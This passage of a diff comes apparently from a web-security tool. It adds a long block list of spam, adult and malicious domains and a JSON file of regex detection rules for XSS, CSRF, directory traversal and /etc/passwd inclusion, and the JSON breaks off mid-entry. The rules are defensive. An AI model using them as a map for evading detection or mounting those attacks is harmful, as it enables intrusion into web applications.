+ukrtextbook.com
+ukrtvir.com.ua
+ukrtvory.in.ua
+ukrup.com
+ultimateclassicrock.com
+ultimatesetnewfreeallsoftupgradesystems.pw
+ultramart.biz
+um-razum.ru
+umaseh.com
+umekana.ru
+umg-stroy.ru
+umityangin.net
+umnovocaminho.com
+unacittaconte.org
+unblocksit.es
+undergroundcityphoto.com
+underthesite.com
+unece.org
+uni.me
+unimodemhalfduplefw.pen.io
+unionmarkt.de
+unisexjewelry.org
+unitexindia.com
+unitygame3d.com
+univerfiles.com
+universals.com.ua
+unlimitdocs.net
+unmaroll.ya.ru
+unpredictable.ga
+unrealcommander.biz
+unrealcommander.com
+unrealcommander.org
+uogonline.com
+upproar.com
+uprour.com
+upstore.me
+uptime-alpha.net
+uptime-as.net
+uptime-delta.net
+uptime-gamma.net
+uptime.com
+uptimebot.net
+uptimechecker.com
+upupa.net
+ural-buldozer.ru
+urccvfmc.bloger.index.hr
+urdoot.win
+urengoy.pro
+url-extractor.xyz
+url-img.link
+url2image.com
+urlcut.ru
+urldelivery.com
+urll.eu
+urlopener.blogspot.com.au
+urlopener.com
+uroffer.link
+uroki.net
+urzedowski.eu
+us-america.ru
+usacasino.com
+usadacha.net
+usbggettwku.ga
+usdx.us
+userequip.com
+usiad.net
+ussearche.cf
+usswrite.com
+ustion.ru
+utiblog.fr
+utrolive.ru
+uvozdeckych.info
+uytmaster.ru
+uzporno.mobi
+uzungil.com
+v-doc.co
+v24s.net
+v720hd.ru
+vabasa.inwtrade.com
+vacances-voyages.info
+vacuumcleanerguru.com
+vacuumscleaner.com
+vadimkravtcov.ru
+validccseller.com
+validdomain.xyz
+valkiria-tk.ru
+valmetrundan.se
+valoresito.com
+valsalud.com
+valuado.com
+valueclick.com
+vancleefreplica.pw
+vandrie-ict.nl
+vapeface.club
+vapomnoncri.tk
+vapsy.com
+varbergsvind.se
+varikoz24.com
+varikozdok.ru
+vashsvet.com
+vasileostrovsky-rayon.ru
+vavilone.com
+vbabule.net
+vbikse.com
+vbtracker.net
+vchulkah.net
+vchulkax.com
+vclicks.net
+vduplo.ru
+vedomstvo.net
+veerotech.com
+vegan-foods.us
+vegascosmetics.ru
+vektorpress.ru
+vekzdorov.ru
+velen.io
+veles.shop
+vellings.info
+velobikestock.com
+velpanex.ru
+venerologiya.com
+venta-prom.ru
+ventelnos.com
+veopornogratis.xxx
+vepad.com
+vereo.eu
+versaut.xxx-cam.webcam
+vertaform.com
+verymes.xyz
+veselokloun.ru
+vesnatehno.com
+vesnatehno.ru
+vezuviy.su
+vgoloveboli.net
+via-energy-acquistare.com
+via-energy-cumpara.com
+via-energy-order.com
+via-gra.webstarts.com
+viagengrarx.com
+viagra-soft.ru
+viagra.pp.ua
+viagraneggrx.com
+viagroid.ru
+viandpet.com
+viberdownload10.com
+viddyoze.com
+video--production.com
+video-camer.com
+video-chat.cn
+video-chat.in
+video-chat.love
+video-hollywood.ru
+video-production.com
+video-woman.com
+videochat.bz
+videochat.cafe
+videochat.life
+videochat.mx
+videochat.ph
+videochat.tv.br
+videochat.world
+videochaty.ru
+videogamesecrets.com
+videojam.tv
+videokrik.net
+videonsk.com
+videooko.weebly.com
+videos-for-your-business.com
+videosbox.ru
+videositename.com
+videospornogratisx.net
+videotuber.ru
+videtubs.pl
+vids18.site
+viel.su
+vielporno.net
+vietimgy.pw
+vigrx-original.ru
+vikistars.com
+viktoria-center.ru
+vilingstore.net
+villacoloniale.com
+villakohlanta.nu
+vinsit.ru
+vintontech.info
+vinylvault.co.uk
+vip-dom.in
+vip-file.com
+vip-parfumeria.ru
+vip.51.la
+vip2ch.com
+vipcallsgirls.com
+vipms.ru
+vipps.com.my
+vipromoffers.com
+vipsexfinders.com
+vipsiterip.org
+virtuagirl.com
+virtualbb.com
+virus-respirators.com
+virus-schutzmasken.de
+visa-china.ru
+visa-pasport.ru
+visionwell.com.cn
+visitcambridge.org
+vita.com.hr
+vitalads.net
+vitanail.ru
+viteonlusarezzo.it
+vitoriacabos.com
+viven.host.sk
+viveresaniesnelli.it
+vizag.kharkov.ua
+vizitki.net
+vk-mus.ru
+vkak.ru
+vkgaleria.com
+vkmusics.ru
+vkonche.com
+vkontaktemusic.ru
+vkontarkte.com
+vksaver-all.ru
+vksex.ru
+vladhistory.com
+vladimir.xrus.org
+vladimir.zrus.org
+vltai.com
+vmnmvzsmn.over-blog.com
+vod.com.ua
+vodaodessa.com
+voditeltrezviy.ru
+vodkoved.ru
+volgograd.xrus.org
+voloo.ru
+voloomoney.com
+voloslove.ru
+voltrknc1.com
+volume-pills.biz
+voluumtracker1.com
+voluumtrk.com
+vonradio.com
+voprosotvet24.ru
+voronezh.xrus.org
+vostoktrade.info
+vote-up.ru
+vozbujdenie.com
+vpnhowto.info
+vpnmouse.com
+vremya.eu
+vriel.batcave.net
+vrnelectro.ru
+vrotike.ru
+vroze.com
+vsdshnik.com
+vse-pesni.com
+vseigru.one
+vseigry.fun
+vsesubwaysurfers.com
+vseuznaem.com
+vsexkontakte.net
+vtc.pw
+vtcdns.com
+vuclip.com
+vucms.com
+vut.com.ru
+vvon.co.uk
+vvpg.ru
+vykup-avto-krasnodar.ru
+vykupavto-krasnodar.ru
+vysigy.su
+vzglyadriv.kg
+vzlom-na-zakaz.com
+vzlomfb.com
+vzlomsn.org
+vzlomtw.com
+vzubah.com
+vzube.com
+w-journal.ru
+w3data.co
+w3javascript.com
+w7s.ru
+wahicbefa31.soup.io
+wait3sec.org
+walkme.com
+wallpaperaccess.com
+wallpapers-best.com
+wallpapersdesk.info
+wallpapersist.com
+wallpaperstock.net
+walpaperlist.com
+wanker.us
+wapsite.me
+wardreapptokone.tk
+wareseeker.com
+warezaccess.com
+warezkeeper.com
+warning.or.kr
+warningwar.ru
+warningzscaler.heraeus.com
+watch-movies.ru
+watchdogs-2.ru
+watchinf.com
+watchmyfb.pl
+watchmygf.net
+waterefficiency.co
+waterpurifier.club
+watracker.net
+watsonrealtycorp.com
+waycash.net
+waysbetter.cn
+wcb.su
+wdfdocando.com
+wdrake.com
+we-are-gamers.com
+web-analytics.date
+web-betting.ru
+web.cvut.cz
+webads.co.nz
+webadvance.club
+webalan.ru
+webcamdevochka.com
+webcamtalk.net
+webenlace.com.ar
+webextract.profound.net
+webinstantservice.com
+webix.biz
+webix.me
+webjam.com
+webkeyit.com
+weblibrary.win
+weblo.com
+webmasterhome.cn
+webmasters.stackexchange.com
+webmonetizer.net
+webnode.me
+weboptimizes.com
+webpromotion.ae
+webradiology.ru
+webs.com
+webscouter.net
+webshoppermac.com
+website-analytics.online
+website-analyzer.info
+website-audit.com.ua
+website-datenbank.de
+website-speed-check.site
+website-speed-checker.site
+website-speed-up.site
+website-speed-up.top
+website-stealer.nufaq.com
+websiteaccountant.de
+websiteexplorer.info
+websites-reviews.com
+websitevaluebot.com
+webstatsdomain.org
+webtherapy.ru
+weburlopener.com
+weburok.com
+wechatdownload10.com
+weclipart.com
+wedding-salon.net
+wedding0venues.tk
+weddingdresses.xyz
+weekes.biz.tc
+weightatraining.com
+wejdz-tu.pl
+welck.octopis.com
+welcomeauto.ru
+wellcome2slovenia.ru
+wemarketing.se
+wemedinc.com
+weprik.ru
+wesharepics.com
+wesharepics.info
+wesharepics.site
+westen-v.life
+westen-z.life
+westermarkanjou.se
+westsextube.com
+westum.se
+westvilletowingservices.co.za
+wetgames.ru
+wfb.hatedriveapart.com
+whatistizanidine2mg.blogspot.com
+whatistizanidinehclusedfor.blogspot.com
+whatsappbot.flyland.ru
+whatsappdownload10.com
+whatsupinfoley.com
+whatzmyip.net
+wheelchairliftsarea.com
+whengirlsgowild.com
+where-toget.com
+whereiskentoday.com
+whereverdesperate.gq
+while.cheapwebsitehoster.com
+whipme.yopoint.in
+white-truck.life
+whiteelephantwellington.com
+whiteproduct.com
+wholesalecheapjerseysfree.com
+wholesalejerseychinaoutlet.com
+wholesalejerseychinashop.com
+wholesalejerseys-cheapest.com
+wholesalejerseyscheapjerseys.us.com
+wholesalejerseysgaa.com
+wholesalenfljerseys.us.com
+wholinkstome.com
+whos.amung.us
+whosonmyserver.com
+wieseversa.no
+wikes.20fr.com
+wildcattube.com
+wildnatureimages.com
+wildworld.site
+williamrobsonproperty.com
+win-spy.com
+windowssearch-exp.com
+wineitudes.wordpress.com
+wineration.com
+wingsoffury2.com
+wingsofrefuge.net
+winner7777.net
+winterclassichockeyjerseys.com
+winwotgold.pl
+winx-play.ru
+wiosenny-bon-1500.pl
+witclub.info
+witherrom55.eklablog.fr
+withstandingheartwarming.com
+wjgony.com
+wladimirpayen.com
+wleuaprpxuvr.ga
+wma-x.com
+wnhjavlhezp.gq
+wnoz.de
+womama.ru
+woman-h.ru
+woman-orgasm.ru
+woman-tampon.ru
+womens-journal.net
+womensplay.net
+womensterritory.ru
+wonderfulflowers.biz
+woodyguthrie.se
+word-vorlagen.net
+word-vorlagen.xyz
+wordkeyhelper.com
+wordpress-crew.net
+wordpresscore.com
+workle.website
+works.if.ua
+world-mmo.com
+worldhistory.biz
+worldinternetauthority.com
+worldis.me
+worldlovers.ru
+worldmusicfests.com
+worldoffiles.ru
+worldtraveler.world
+wormix-cheats.ru
+worst-sites.online
+wosik-dach.service-for-web.de
+wovis.site
+wowas31.ucoz.ru
+wowcasinoonline.ooo
+woweb.com.ua
+wpsecurity.website
+wpthemedetector.co.uk
+writersgroup580.web.fc2.com
+writingservices17.blogspot.ru
+wrona.it
+wrz0iuebwhp5fg.freeddns.com
+ws.ampower.me
+wsgames.ru
+wstroika.ru
+wtsindia.in
+wttavern.com
+wufak.com
+wurr.voila.net
+ww1943.ru
+ww2awards.info
+www.888.com
+www.arenda-yeisk.ru
+www.bookmaker-bets.com
+www.ehscloud.cn
+www.event-tracking.com
+www.get-free-traffic-now.com
+www.jbetting.com
+www.kabbalah-red-bracelets.com
+www.labves.ru
+www.pinnacle-bets.com
+www.solartek.ru
+www.souvenirua.com
+www.timer4web.com
+www.wohnkabinen-shop.de
+wwwadultcheck.com
+wygraj-skiny.win
+wygraj-teraz.com
+wyniki-lista.pl
+wzgyyq.com
+x-diesel.biz
+x-diesel.com
+x-diesel.info
+x-diesel.org
+x-lime.com
+x-lime.net
+x-mix.info
+x-musics.com
+x-porno.video
+x-rates.ru
+x-stars.ru
+x-true.info
+x5market.ru
+x69ty.ru
+xaijo.com
+xaylapdiendanang.com
+xbaboon.com
+xblog.in
+xblognetwork.com
+xboxster.ru
+xcc24.pl
+xchangetrak.com
+xchat26.myfreecams.com
+xclicks.net
+xcombear.ru
+xdoza.com
+xedserver.com
+xep.info
+xerox-douglas.cf
+xev.ru
+xfire.com
+xfluro.com
+xgames-04.com
+xgftnlrt.bloger.index.hr
+xingzi-vision.com
+xitjw.info
+xjlottery.com
+xjrul.com
+xkaz.org
+xlolitka.com
+xlovecam.com
+xmladserver.com
+xmlinde.com
+xmnb.net
+xmronta.com
+xn------7cdbapdecfd4ak1bn0amjffj7afu3y.xn--p1ai
+xn-----6kcaabbafhu7cskl7akvongwpo7hvjj.xn--p1ai
+xn-----6kcaacnblni5c5bicdpcmficy.xn--p1ai
+xn-----6kccaibs5cb8afhjrfmix2n.xn--p1ai
+xn-----7kcabaipgeakzcss7bjdqdwpfnhv.xn--p1ai
+xn-----7kceclhb4abre1b4a0ccl2fxch1a.xn--p1ai
+xn-----8kcatubaocd1bneepefojs1h2e.xn--p1ai
+xn----7sbaaabaei0cc8aj5bj0bncejx.xn--p1ai
+xn----7sbahjd3btneuw1joc.xn--p1ai
+xn----7sbaphztdjeboffeiof6c.xn--p1ai
+xn----7sbbagbq7bd5aheftfllo4m.xn--p1ai
+xn----7sbbahaq9bb5afgiqfliv4m.xn--p1ai
+xn----7sbho2agebbhlivy.xn--p1ai
+xn----7sbifcamovvfggw9d.xn--p1ai
+xn----8sbarihbihxpxqgaf0g1e.xn--80adxhks
+xn----8sbdbjgb1ap7a9c4czbh.xn--p1acf
+xn----8sbhefaln6acifdaon5c6f4axh.xn--p1ai
+xn----8sblgmbj1a1bk8l.xn----161-4vemb6cjl7anbaea3afninj.xn--p1ai
+xn----9sbebi2bvzr7h.xn--p1ai
+xn----9sbubg3ambdfl1j.xn--p1ai
+xn----btbdvdh4aafrfciljm6k.xn--p1ai
+xn----ctbbcjd3dbsehgi.xn--p1ai
+xn----ctbigni3aj4h.xn--p1ai
+xn----dtbndd4ae7eub.top
+xn----itbeirbjbi7bc6bh2d.xn--p1ai
+xn----itbkqkfiq.xn--p1ai
+xn--1-8sbcpb0bdm8k6a.xn--p1ai
+xn--24-glceagatoq7c2a6ioc.xn--p1ai
+xn--80aaafbn2bc2ahdfrfkln6l.xn--p1ai
+xn--80aaagvmjabrs1aoc9luc.xn--p1ai
+xn--80aaajbdbddwj2alwjieei2afr3v.xn--p1ai
+xn--80aaaks3bbhabgbigamdr2h.xn--p1ai
+xn--80aafb2a.xn--p1ai
+xn--80aagddcgkbcqbad7amllnejg6dya.xn--p1ai
+xn--80aanaardaperhcem4a6i.com
+xn--80ab4aa2g.xn--p1ai
+xn--80abgj3a5acid6ghs.top
+xn--80adaggc5bdhlfamsfdij4p7b.xn--p1ai
+xn--80aeahghtf8ac5i.xn--p1ai
+xn--80aebbcbcdemfkhba4byaehoejh8dza3v.xn--p1ai
+xn--80ahdheogk5l.xn--p1ai
+xn--80ahvj9e.xn--p1ai
+xn--80aikhbrhr.net
+xn--80ajbshivpvn2i.xn--p1ai
+xn--80ajjbdhgmudixfjc8c5a9df8b.xn--p1ai
+xn--80ak6aa92e.com
+xn--80aodinpgi.xn--p1ai
+xn--80atua3d.xn--p1ai
+xn--90acenikpebbdd4f6d.xn--p1ai
+xn--b1adccaf1bzj.xn--p1ai
+xn--b1addnj3cah.xn--p1ai
+xn--b1ag5cfn.xn--p1ai
+xn--b1agm2d.net
+xn--c1acygb.xn--p1ai
+xn--d1abj0abs9d.in.ua
+xn--d1acah0c.xn--p1ai
+xn--d1aifoe0a9a.top
+xn--e1afanlbnfckd7c3d.xn--p1ai
+xn--e1aggki3c.xn--80adxhks
+xn--h1aakne2ba.xn--p1ai
+xn--h1ahbi.com.ua
+xn--hxazdsfy.blogspot.com
+xn--l1aengat.xn--p1ai
+xn--lifehacer-1rb.com
+xn--oogle-wmc.com
+xn--q1a.xn--b1aube0e.xn--c1acygb.xn--p1ai
+xnxx-n.com
+xnxx699.com
+xnxxandxvideos.com
+xolodremont.ru
+xportvusbdriver8i.snack.ws
+xpresscare.ru
+xrus.org
+xsfetish.org
+xsion.net
+xtraffic.plus
+xtrafficplus.com
+xtremeeagles.net
+xtube.com
+xtubeporno.net
+xuki.us
+xvideosbay.com
+xvideosporn.biz
+xvideospornoru.com
+xwatt.ru
+xxart.ru
+xxlargepop.com
+xxx-cam.webcam
+xxx-treker.ru
+xxxasianporn.net
+xxxdatinglocal.us
+xxxguitars.com
+xxxhdvideo.site
+xxxkaz.org
+xxxmania.top
+xxxnatelefon.ru
+xxxrus.org
+xxxsiterips.xyz
+xxxtube69.com
+xxxtubesafari.com
+xz618.com
+xzlive.com
+y8games-free.com
+yaaknaa.info
+yachts-cruise.info
+yaderenergy.ru
+yadro.ru
+yaminecraft.ru
+yaoguangdj.com
+yatrk.xyz
+yeartwit.com
+yebocasino.co.za
+yebocasino.com
+yellocloud.be
+yellowads.men
+yellowfootprints.com
+yellowproxy.net
+yellowstonesafaritours.com
+yellowstonevisitortours.com
+yes-com.com
+yginekologa.com
+yhit.press
+ynymnwbm.bloger.index.hr
+yogamatsexpert.com
+yoluxuryevents.com
+yoopsie.com
+yopoint.in
+yoshkarola.zrus.org
+yottos.com
+you-shall-not-pass.is74.ru
+youandcredit.ru
+youbloodyripper.com
+youbrainboost.asia
+youdao.com
+youdesigner.kz
+yougame.biz
+yougetsignal.com
+youghbould.wordpress.com
+yougotanewdomain.com
+youjizz.com
+youjizz.vc
+youporn-forum.ga
+youporn-ru.com
+your-bearings.com
+youradexchange.com
+yourads.website
+youradulthosting.com
+youraticles.pl
+yourdesires.ru
+youresponsive.com
+yourmovies.pl
+yourothersite.com
+yourporn.com
+yourporngay.com
+yoursearch.me
+yourserverisdown.com
+yoursite.com
+yourtemplatefinder.com
+yousense.info
+youthreaders.com
+youtoner.it
+youtube-downloader.savetubevideo.com
+youtubedownload.org
+youtubologia.it
+youtuhe.com
+ypmuseum.ru
+ytmnd.com
+yuarra.pluto.ro
+yubikk.info
+yugk.net
+yugo-star.ru
+yun56.co
+yunque.pluto.ro
+yur-p.ru
+yurgorod.ru
+yuweng.info
+z-master.ru
+za-fun-offer.com
+za-music.mymobiplanet.com
+zaapplesales.blogspot.com
+zacreditom.ru
+zagadki.in.ua
+zahvat.ru
+zaidia.xhost.ro
+zaim-pod-zalog-krasnodar.ru
+zaimhelp.ru
+zaimite.ru
+zajm-pod-zalog-nedvizhimosti.ru
+zajm-zalog-krasnodar.ru
+zakazfutbolki.com
+zakazvzloma.com
+zakon-ob-obrazovanii.ru
+zakonobosago.ru
+zaloadi.ru
+zaloro.com
+zambini.ru
+zaobao.com.sg
+zapatosenventa.info
+zapiszto.pl
+zarabiaj-dzis.pl
+zarabotat-na-sajte.ru
+zarabotok--doma.ru
+zarajbuilders.com
+zarenica.net
+zarepta.com
+zastenchivosti.net
+zastroyka.org
+zatjmuzu.info
+zawyna.ua
+zazagames.org
+zdesformula.ru
+zdesoboi.com
+zebradudka.com
+zebramart.ru
+zed21.net
+zeg-distribution.com
+zeikopay.com
+zeleznobeton.ru
+zero1.it
+zerocash.msk.ru
+zeroredirect.com
+zeroredirect1.com
+zeroredirect10.com
+zeroredirect11.com
+zeroredirect12.com
+zeroredirect2.com
+zeroredirect5.com
+zeroredirect6.com
+zeroredirect7.com
+zeroredirect8.com
+zeroredirect9.com
+zetgie.com.pl
+zetmaster.ru
+zhacker.net
+zhongwenlink.com
+zhorapankratov7.blogspot.com
+zhuravlev.info
+zigarettenonl.canalblog.com
+zigarettenonlinekaufen.tumblr.com
+zigarettenonlinekaufen1.bloog.pl
+zigarettenonlinekaufen1.blox.pl
+zigarettenonlinekaufen2.bloog.pl
+zigarettenonlinekaufen2.drupalgardens.com
+zigzog.ru
+zionstar.net
+zirondelli.it
+zixizop.net.ru
+zkjovpdgxivg.ga
+zlatnajesen.com
+zmoda.hostreo.com
+znakom.sibtest.ru
+znakomstva-moskva77.ru
+znakomstva-piter78.ru
+znakomstvaonlain.ru
+znaniyapolza.ru
+znaturaloriginal.com
+zocaparj.kz
+zog.link
+zojirushi-products.ru
+zolotoy-lis.ru
+zona-aqua.ru
+zone-kev717.info
+zoodrawings.com
+zoogdiesney.com
+zoogdinsney.com
+zoogdisany.com
+zooggames.com
+zoolubimets.ru
+zoominfo.com
+zoomovies.org
+zoompegs.com
+zoosexart.com
+zootoplist.com
+zootravel.com
+zophim.me
+zrelaya.pw
+zreloeporno.tv
+zrizvtrnpale.tk
+zrus.org
+zryydi.com
+zs2vm.top
+zscaler.net
+zscalerone.net
+zscalertwo.net
+zskdla.site
+zverokruh-shop.cz
+zvetki.ru
+zvezdagedon.ru
+zvooq.eu
+zvuker.net
+zx6.ru
+zygophyceous.womanstars.site
+zynax.ua
+zytpirwai.net
+zzbroya.com.ua
+zzlgxh.com
\ No newline at end of file
diff --git a/db/common-web-attacks.json b/db/common-web-attacks.json
new file mode 100644
index 00000000..70cad69c
--- /dev/null
+++ b/db/common-web-attacks.json
@@ -0,0 +1 @@
+{"filters":[{"id":1,"rule":"(?:\"[^\"]*[^-]?>)|(?:[^\\w\\s]\\s*\\/>)|(?:>\")","description":"finds html breaking injections including whitespace attacks","tags":["xss","csrf"],"impact":4},{"id":2,"rule":"(?:\"+.*[<=]\\s*\"[^\"]+\")|(?:\"\\s*\\w+\\s*=)|(?:>\\w=\\/)|(?:#.+\\)[\"\\s]*>)|(?:\"\\s*(?:src|style|on\\w+)\\s*=\\s*\")|(?:[^\"]?\"[,;\\s]+\\w*[\\[\\(])","description":"finds attribute breaking injections including whitespace attacks","tags":["xss","csrf"],"impact":4},{"id":3,"rule":"(?:^>[\\w\\s]*<\\/?\\w{2,}>)","description":"finds unquoted attribute breaking injections","tags":["xss","csrf"],"impact":2},{"id":4,"rule":"(?:[+\\/]\\s*name[\\W\\d]*[)+])|(?:;\\W*url\\s*=)|(?:[^\\w\\s\\/?:>]\\s*(?:location|referrer|name)\\s*[^\\/\\w\\s-])","description":"Detects url-, name-, JSON, and referrer-contained payload attacks","tags":["xss","csrf"],"impact":5},{"id":5,"rule":"(?:\\W\\s*hash\\s*[^\\w\\s-])|(?:\\w+=\\W*[^,]*,[^\\s(]\\s*\\()|(?:\\?\"[^\\s\"]\":)|(?:(?<!\\/)__[a-z]+__)|(?:(?:^|[\\s)\\]\\}])(?:s|g)etter\\s*=)","description":"Detects hash-contained xss payload attacks, setter usage and property overloading","tags":["xss","csrf"],"impact":5},{"id":6,"rule":"(?:with\\s*\\(\\s*.+\\s*\\)\\s*\\w+\\s*\\()|(?:(?:do|while|for)\\s*\\([^)]*\\)\\s*\\{)|(?:\\/[\\w\\s]*\\[\\W*\\w)","description":"Detects self contained xss via with(), common loops and regex to string conversion","tags":["xss","csrf"],"impact":5},{"id":7,"rule":"(?:[=(].+\\?.+:)|(?:with\\([^)]*\\)\\))|(?:\\.\\s*source\\W)","description":"Detects JavaScript with(), ternary operators and XML predicate attacks","tags":["xss","csrf"],"impact":5},{"id":8,"rule":"(?:\\/\\w*\\s*\\)\\s*\\()|(?:\\([\\w\\s]+\\([\\w\\s]+\\)[\\w\\s]+\\))|(?:(?<!(?:mozilla\\/\\d\\.\\d\\s))\\([^)[]+\\[[^\\]]+\\][^)]*\\))|(?:[^\\s!][{([][^({[]+[{([][^}\\])]+[}\\])][\\s+\",\\d]*[}\\])])|(?:\"\\)?\\]\\W*\\[)|(?:=\\s*[^\\s:;]+\\s*[{([][^}\\])]+[}\\])];)","description":"Detects self-executing JavaScript functions","tags":["xss","csrf"],"impact":5},{"id":9,"rule":"(?i)(?:\\\\u(?:\\{(0{1,})?[a-f0-9]{2}\\}|00[a-f0-9]{2}))|(?:\\\\x0*[a-f0-9]{2})|(?:\\\\\\d{2,3})","description":"Detects the IE octal, hex and unicode entities","tags":["xss","csrf"],"impact":2},{"id":10,"rule":"(?:(?:\\/|\\\\)?\\.+(\\/|\\\\)(?:\\.+)?)|(?:\\w+\\.exe\\??\\s)|(?:;\\s*\\w+\\s*\\/[\\w*-]+\\/)|(?:\\d\\.\\dx\\|)|(?:%(?:c0\\.|af\\.|5c\\.))|(?:\\/(?:%2e){2})","description":"Detects basic directory traversal","tags":["dt","id","lfi"],"impact":5},{"id":11,"rule":"(?:%c0%ae\\/)|(?:(?:\\/|\\\\)(home|conf|usr|etc|proc|opt|s?bin|local|dev|tmp|kern|[br]oot|sys|system|windows|winnt|program|%[a-z_-]{3,}%)(?:\\/|\\\\))|(?:(?:\\/|\\\\)inetpub|localstart\\.asp|boot\\.ini)","description":"Detects specific directory and path traversal","tags":["dt","id","lfi"],"impact":5},{"id":12,"rule":"(?:etc\\/\\W*passwd)","description":"Detects etc/passwd inclusion attempts","tags":["dt","id","lfi"],"impact":5},{"id":13,"rule":"(?:%u(?:ff|00|e\\d)\\w\\w)|(?:(?:%(?:e\\w|c[^3\\W]|))(?:%\\w\\w)(?:%\\w\\w)?)","description":"Detects halfwidth/fullwidth encoded unicode HTML breaking attempts","tags":["xss","csrf"],"impact":3},{"id":14,"rule":"(?:#@~\\^\\w+)|(?:\\w+script:|@?import\\s*\\(?|;base64|base64,)|(?:\\w\\s*\\([\\w\\s]+,[\\w\\s]+,[\\w\\s]+,[\\w\\s]+,[\\w\\s]+,[\\w\\s]+\\))","description":"Detects possible includes, VBSCript/JScript encoded and packed functions","tags":["xss","csrf","id","rfe"],"impact":5},{"id":15,"rule":"([^*:\\s\\w,.\\/?+-]\\s*)?(?<![a-z]\\s)(?<![a-z\\/_@\\-\\|])(\\s*return\\s*)?(?:create(?:element|attribute|textnode)|[a-z]+events?|setattribute|getelement\\w+|appendchild|createrange|createcontextualfragment|removenode|parentnode|decodeuricomponent|\\wettimeout|(?:ms)?setimmediate|option|useragent)(?(1)[^\\w%\"]|(?:\\s*[^@\\s\\w%\",.+\\-]))","description":"Detects JavaScript DOM/miscellaneous properties and methods","tags":["xss","csrf","id","rfe"],"impact":6},{"id":16,"rule":"([^*\\s\\w,.\\/?+-]\\s*)?(?<![a-mo-z]\\s)(?<![a-z\\/_@])(\\s*return\\s*)?(?:alert|inputbox|showmod(?:al|eless)dialog|showhelp|infinity|isnan|isnull|iterator|msgbox|executeglobal|expression|prompt|write(?:ln)?|confirm|dialog|urn|(?:un)?eval|exec|execscript|tostring|status|execute|window|unescape|navigate|jquery|getscript|extend|prototype)(?(1)[^\\w%\"]|(?:\\s*[^@\\s\\w%\",.:\\/+\\-]))","description":"Detects possible includes and typical script methods","tags":["xss","csrf","id","rfe"],"impact":5},{"id":17,"rule":"([^*:\\s\\w,.\\/?+-]\\s*)?(?<![a-z]\\s)(?<![a-z\\/_@])(\\s*return\\s*)?(?:hash|name|href|navigateandfind|source|pathname|close|constructor|port|protocol|assign|replace|back|forward|document|ownerdocument|window|top|this|self|parent|frames|_?content|date|cookie|innerhtml|innertext|csstext+?|outerhtml|print|moveby|resizeto|createstylesheet|stylesheets)(?(1)[^\\w%\"]|(?:\\s*[^@\\/\\s\\w%.+\\-])['\"`])","description":"Detects JavaScript object properties and methods","tags":["xss","csrf","id","rfe"],"impact":4},{"id":18,"rule":"([^*:\\s\\w,.\\/?+-]\\s*)?(?<![a-z]\\s)(?<![a-z\\/_@\\-\\|])(\\s*return\\s*)?(?:join|pop|push|reverse|reduce|concat|map|shift|sp?lice|sort|unshift)(?(1)[^\\w%\"]|(?:\\s*[^@\\s\\w%,.+\\-]))","description":"Detects JavaScript array properties and methods","tags":["xss","csrf","id","rfe"],"impact":4},{"id":19,"rule":"([^*:\\s\\w,.\\/?+-]\\s*)?(?<![a-z]\\s)(?<![a-z\\/_@\\-\\|])(\\s*return\\s*)?(?:set|atob|btoa|charat|charcodeat|charset|concat|crypto|frames|fromcharcode|indexof|lastindexof|match|navigator|toolbar|menubar|replace|regexp|slice|split|substr|substring|escape|\\w+codeuri\\w*)(?(1)[^\\w%\"]|(?:\\s*[^@\\s\\w%,.+\\-]))","description":"Detects JavaScript string properties and methods","tags":["xss","csrf","id","rfe"],"impact":4},{"id":20,"rule":"(?:\\)\\s*\\[)|([^*\":\\s\\w,.\\/?+-]\\s*)?(?<![a-z]\\s)(?<![a-z_@\\|])(\\s*return\\s*)?(?:globalstorage|sessionstorage|postmessage|callee|constructor|content|domain|prototype|try|catch|top|call|apply|url|function|object|array|string|math|if|for\\s*(?:each)?|elseif|case|switch|regex|boolean|location|(?:ms)?setimmediate|settimeout|setinterval|void|setexpression|namespace|while)(?(1)[^\\w%\"]|(?:\\s*[^@\\s\\w%\".+\\-\\/]))","description":"Detects JavaScript language constructs","tags":["xss","csrf","id","rfe"],"impact":4},{"id":21,"rule":"(?:,\\s*(?:alert|showmodaldialog|eval)\\s*,)|(?::\\s*eval\\s*[^\\s])|([^:\\s\\w,.\\/?+-]\\s*)?(?<![a-z\\/_@])(\\s*return\\s*)?(?:(?:document\\s*\\.)?(?:.+\\/)?(?:alert|eval|msgbox|showmod(?:al|eless)dialog|showhelp|prompt|write(?:ln)?|confirm|dialog|open))\\s*(?:[^.a-z\\s\\-]|(?:\\s*[^\\s\\w,.@\\/+-]))|(?:java[\\s\\/]*\\.[\\s\\/]*lang)|(?:\\w\\s*=\\s*new\\s+\\w+)|(?:&\\s*\\w+\\s*\\)[^,])|(?:\\+[\\W\\d]*new\\s+\\w+[\\W\\d]*\\+)|(?:document\\.\\w)","description":"Detects very basic XSS probings","tags":["xss","csrf","id","rfe"],"impact":3},{"id":22,"rule":"(?:=\\s*(?:top|this|window|content|self|frames|_content))|(?:\\/\\s*[gimx]*\\s*[)}])|(?:[^\\s]\\s*=\\s*script)|(?:\\.\\s*constructor)|(?:default\\s+xml\\s+namespace\\s*=)|(?:\\/\\s*\\+[^+]+\\s*\\+\\s*\\/)","description":"Detects advanced XSS probings via Script(), RexExp, constructors and XML namespaces","tags":["xss","csrf","id","rfe"],"impact":5},{"id":23,"rule":"(?:\\.\\s*\\w+\\W*=)|(?:\\W\\s*(?:location|document)\\s*\\W[^({[;]+[({[;])|(?:\\(\\w+\\?[:\\w]+\\))|(?:\\w{2,}\\s*=\\s*\\d+[^&\\w]\\w+)|(?:\\]\\s*\\(\\s*\\w+)","description":"Detects JavaScript location/document property access and window access obfuscation","tags":["xss","csrf"],"impact":5},{"id":24,"rule":"(?:[\".]script\\s*\\()|(?:\\$\\$?\\s*\\(\\s*[\\w\"])|(?:\\/[\\w\\s]+\\/\\.)|(?:=\\s*\\/\\w+\\/\\s*\\.)|(?:(?:this|window|top|parent|frames|self|content)\\[\\s*[(,\"]*\\s*[\\w\\$])|(?:,\\s*new\\s+\\w+\\s*[,;)])","description":"Detects basic obfuscated JavaScript script injections","tags":["xss","csrf"],"impact":5},{"id":25,"rule":"(?:=\\s*[$\\w]\\s*[\\(\\[])|(?:\\(\\s*(?:this|top|window|self|parent|_?content)\\s*\\))|(?:src\\s*=s*(?:\\w+:|\\/\\/))|(?:\\w+\\[(\"\\w+\"|\\w+\\|\\|))|(?:[\\d\\W]\\|\\|[\\d\\W]|\\W=\\w+,)|(?:\\/\\s*\\+\\s*[a-z\"])|(?:=\\s*\\$[^([]*\\()|(?:=\\s*\\(\\s*\")","description":"Detects obfuscated JavaScript script 